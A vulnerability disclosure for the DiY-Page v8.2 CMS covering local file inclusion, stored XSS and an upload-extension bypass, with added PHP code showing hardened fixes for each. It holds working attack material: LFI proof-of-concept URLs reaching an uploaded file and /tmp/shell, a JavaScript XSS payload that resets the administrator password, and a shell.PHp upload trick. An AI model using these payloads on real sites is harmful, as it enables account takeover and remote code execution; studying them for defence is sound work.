Author: cnryan @ http://hi.baidu.com/cnryan
On t00ls I saw a post by a shoes analysing the DiY-Page SQL injection vulnerability. After reading the code myself I found that DiY-Page v8.2 still has several other vulnerabilities: local file inclusion, arbitrary file upload and cross-site scripting, among others.
A. Local File Inclusion Vulnerability
// js.php
$incfile = PATH_PRE.'mod/'.$_GET['mod'].'/js/'.$_GET['name'].'.php';
if (!include $incfile) dperror($l_error['cant_include'], $incfile, true);
The bug is obvious: mod and name go straight from $_GET into the include path. With magic_quotes_gpc off one would normally drop the trailing .php with a %00 byte and include an uploaded attachment, but DiY-Page runs addslashes() over the input itself when GPC is off, so the null byte is escaped.
Two routes remain. Pad the path with enough slashes that older PHP builds (before 5.3) truncate it at MAXPATHLEN and lose the .php suffix, which lets an uploaded attachment (stored as *.file) be included; or include a webshell that has been placed in /tmp by some other means.
POC (the number of ../ segments depends on where DiY-Page is installed relative to mod/dpuser/js/):
http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../up/201102/20110213_dd7ec931179c4dcb6a8ffb8b8786d20b_17872a.txt.file/////////////////
http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../../../../tmp/shell
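For comparison, here is an added example (not DiY-Page code) of how js.php could build the same include path safely: both parameters are reduced to plain identifiers before they touch the filesystem. PATH_PRE, the module whitelist and the sample inputs are assumptions made for this demo; it needs PHP 7.1 or later.

```php
<?php
// Added example, not DiY-Page code: a hardened replacement for the js.php include
// path construction. PATH_PRE and the module list are assumptions for the demo.
define('PATH_PRE', __DIR__ . '/');

// Returns the include path, or null when either parameter is not a plain identifier.
// The character class leaves no way to write "/", "." or a NUL byte, so neither
// directory traversal nor the slash-padding / %00 tricks can reach the path;
// \z (rather than $) also refuses a trailing newline.
function safe_js_include_path(string $mod, string $name): ?string
{
    $allowed_mods = array('dpuser', 'dpentry'); // assumed whitelist of modules that ship js/ files
    if (!in_array($mod, $allowed_mods, true)) {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $name)) {
        return null;
    }
    return PATH_PRE . 'mod/' . $mod . '/js/' . $name . '.php';
}

// Constructed inputs: one legitimate request, then attack strings shaped like the POC.
$cases = array(
    array('dpuser', 'default'),
    array('dpuser', '../../../up/201102/x.txt.file/////////'),
    array('dpuser', "../../../tmp/shell\0"),
    array('../../../etc', 'passwd'),
);
foreach ($cases as $c) {
    $path = safe_js_include_path($c[0], $c[1]);
    printf("%-45s => %s\n", addcslashes($c[0] . '/' . $c[1], "\0"),
        $path === null ? 'rejected' : $path);
}
// Only the first case yields a path; the caller should still test is_file($path)
// before include, as the original's dperror() branch intends.
```

A whitelist on the module name is preferable to a regex alone because it also stops a valid-looking identifier from selecting a module directory that was never meant to expose js/ files.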
B. Cross-Site xss vulnerabilities
Many places echo user input without any filtering. Typical code:
if ($_POST['issubmit'] == 'true') {
    $fidarray = trim($_POST['fidarray'], ',');
    $backurl = 'javascript:history.go(-1);';
    $actionurlold = $actionurl;
    $actionurl .= '&do=list&cataid='.$_GET['cataid'];
    $entrytitle = $_POST['entrytitle'];
    $entrycontent = $_POST['entrycontent'];
    $entrytag = trim($_POST['entrytag']);
    ......
JavaScript placed in the title of a published entry is stored as-is and executes wherever the title is rendered, both on the front page and in the admin backend (stored XSS).
With that you can do a lot: hijack sessions, steal cookies, escalate privileges, write a shell. Below is JavaScript that resets the administrator's password by replaying the backend's user-edit form with the victim's own cookie:
var xmlhttp = false;
if (window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    if (!xmlhttp) { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
}
var action = "/diypage/admin.php?mod=modcp&formod=dpuser&item=useradm&do=edit&uid=1&page=1&perpage=20";
var data = "gid=2&oldgid=2&dpusername=admin&dpusernewpassword=cnryan&usertpl=&regip=&loginip=&dpuseremail=&dpusermoney=0&dpuserintro=&avatar=default.gif&nickname=&issubmit=true";
xmlhttp.open("POST", action, false);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(data);
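The following is an added example (not DiY-Page code) of the two defences that passage calls for: encoding stored entry fields on output, which is the real fix for the XSS, and a per-session token on admin.php state-changing POSTs so that the useradm edit above cannot be replayed with the admin's cookie alone. Function names, the session layout and the sample title are assumptions for the demo; it needs PHP 7 or later.

```php
<?php
// Added example, not DiY-Page code. Two layers against the stored XSS shown above:
// output encoding of entry fields (the actual fix) and a per-session token on
// admin.php state-changing POSTs (defence in depth). Names are assumptions.

// Encode for an HTML text or attribute context before echoing any stored field.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Token issued once per session and embedded as a hidden field in admin forms.
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(16));
    }
    return $_SESSION['csrf'];
}

// Constant-time comparison; a missing or wrong token rejects the request.
function csrf_check(array $post): bool
{
    return isset($post['csrf'], $_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], (string) $post['csrf']);
}

// Demo with a constructed session and the kind of title the article describes.
$_SESSION = array();  // stands in for session_start() in this stand-alone run
$entrytitle = '<script>/* password-reset XHR from the article */</script>';
echo '<h1>' . h($entrytitle) . "</h1>\n";   // &lt;script&gt;... : inert text, not markup

$forged  = array('issubmit' => 'true', 'dpusernewpassword' => 'cnryan'); // what the XSS payload POSTs
$genuine = $forged + array('csrf' => csrf_token());                      // what the rendered form POSTs
var_dump(csrf_check($forged));   // bool(false)
var_dump(csrf_check($genuine));  // bool(true)
```

Note the caveat: the token on its own would not stop this particular attack, because the injected script runs in the admin's origin and could fetch the edit form and read the token out of it. That is why the output encoding is the primary fix, and why a password change should additionally require the current password rather than just a logged-in session.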
C. Upload Vulnerability
The get_upload_filename() function that DiY-Page uses to name uploaded attachments is flawed. The code:
// inc/func.php
function get_upload_filename($realname) {
    $exttmp = explode(".", $realname);
    $ext = $exttmp[count($exttmp)-1];
    $ext = str_replace(array('asp', 'asa', ';', '"', 'php'), '', $ext); // filter executable files
    $filepath = get_upload_path().'/';
    $filesubdir = date('Ym').'/';
    mkdir($filepath.$filesubdir, 0777);
    $datetmp = explode(" ", microtime());
    $filesuffix = substr(md5($datetmp[1]), 0, 6);
    if (!in_array(strtolower($ext), array('jpg', 'gif', 'png', 'bmp'))) $ext .= '.file'; // append .file to non-image extensions
    $filename = $filesubdir.date('Ymd').'_'.md5($realname).'_'.$filesuffix.'.'.$ext;
    $filepath .= $filename;
    return array('filename' => $filename, 'filepath' => $filepath);
}
get_upload_filename() blanks the substrings asp, asa and php out of the extension, but str_replace() is case-sensitive, so an extension such as PHp passes through untouched. Any extension that is not jpg, gif, png or bmp then simply gets .file appended rather than being rejected, which is exactly the shape Apache's multiple-extension handling exploits: mod_mime matches extensions case-insensitively and, when the rightmost extension (.file) is not mapped to anything, falls back to the one before it, so a stored name ending in .PHp.file is run as PHP.
To exploit it: register an ordinary member, publish an entry and attach a file named e.g. shell.PHp. It is stored under up/YYYYMM/ as <date>_<md5>_<suffix>.PHp.file and executes as PHP.
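As an added example (not DiY-Page code), the block below models the extension handling of get_upload_filename() without touching the filesystem and puts a whitelist-based replacement next to it. It goes one step beyond the page's PHp case: because str_replace() makes a single left-to-right pass, an extension like pphphp also comes out as php. The sample file names, the helper names and the fixed stem are constructed for this demo; it needs PHP 7 or later.

```php
<?php
// Added example, not DiY-Page code: a filesystem-free model of get_upload_filename()'s
// extension handling (the original's date/mkdir/microtime parts are left out) beside a
// whitelist-based replacement. Names and sample inputs are constructed for the demo.

// Same blacklist logic as the original.
function original_ext_handling(string $realname): string
{
    $exttmp = explode('.', $realname);
    $ext = $exttmp[count($exttmp) - 1];
    $ext = str_replace(array('asp', 'asa', ';', '"', 'php'), '', $ext); // case-sensitive, single pass
    if (!in_array(strtolower($ext), array('jpg', 'gif', 'png', 'bmp'))) {
        $ext .= '.file';
    }
    return md5($realname) . '.' . $ext;
}

// Hardened: case-folded whitelist, reject everything else, random stem, single extension.
function hardened_filename(string $realname): ?string
{
    $allowed = array('jpg', 'jpeg', 'gif', 'png', 'bmp');
    $ext = strtolower(pathinfo($realname, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null; // refuse the upload instead of renaming it
    }
    // One known extension only, so mod_mime has nothing to fall back to,
    // and no attacker-controlled bytes remain in the stored name.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

foreach (array('cat.jpg', 'shell.php', 'shell.PHp', 'shell.pphphp') as $n) {
    printf("%-13s original: %-45s hardened: %s\n", $n,
        original_ext_handling($n), hardened_filename($n) ?? 'rejected');
}
// shell.PHp    -> <md5>.PHp.file  (blacklist never matched; Apache may still run it as PHP)
// shell.pphphp -> <md5>.php.file  (single-pass str_replace leaves "php" behind)
```

Renaming alone is not enough either way; the upload directory should also be denied script execution (with mod_php, for instance, `php_flag engine off` in that directory's .htaccess where AllowOverride permits it), so that a naming bug like this one cannot turn an attachment into code.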
Finally, I wish the wst mysterious project every success ;-)